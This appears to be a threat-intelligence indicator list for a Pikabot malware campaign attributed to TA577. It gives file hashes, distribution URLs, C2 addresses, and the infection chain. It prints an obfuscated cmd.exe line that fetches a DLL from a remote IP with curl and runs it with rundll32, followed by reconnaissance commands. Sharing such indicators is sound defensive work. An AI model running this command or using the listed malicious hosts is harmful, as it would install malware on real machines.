Pikabot_17.10.2023.txt
17.10.2023 | Pikabot | TA577 |
*************************************************
.url https://shubhshadi.co.in/qmun/
.zip 09636b8b2245f94c3117969148d4d5edae984f7128e38bead3f6a7791c85b440
.zip 9a44adc1b48de78f1f7d977cff79e47f2e61c61a5d6a96c20f3ae973193670e2
.dll b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62
*************************************************
zip > lnk > curl > dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\opt-13.js
cmd.exe /c TR || eChO TR & PIng TR || curl http://116.203.159.191/yAGmH/Exped -o %tMp%\TR.log & PIng -n 4 TR || RUNdll32 %Tmp%\TR.log, CrashForExceptionExportThunk & EXIT FlTRZ=jbnIYyZJ
PIng TR
PIng -n 4 TR
RUNdll32 C:\Users\Admin\AppData\Local\Temp\TR.log, CrashForExceptionExportThunk
System32\SearchProtocolHost.exe
whoami.exe /all
ipconfig.exe /all
netstat.exe -aon
*************************************************
distro url
https://shubhshadi.co.in/qmun/
*************************************************
.dll distro
http://116.203.159.191/yAGmH/Exped
http://195.201.90.237/DrDMr/presi
http://45.63.106.193/PmpZ/outcu
http://140.82.31.164/CKED/Aeros
*************************************************
c2
url request pattern:
https://185.106.94.174:5000/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.174:5000/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.177:13721/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://80.85.140.43:9785/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.152:13720/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.167:5631/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://80.85.140.152:5938/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.174:5000/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.177:13721/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
185.106.94.174:5000
185.106.94.177:13721
80.85.140.43:9785
185.106.94.152:13720
185.106.94.167:5631
80.85.140.152:5938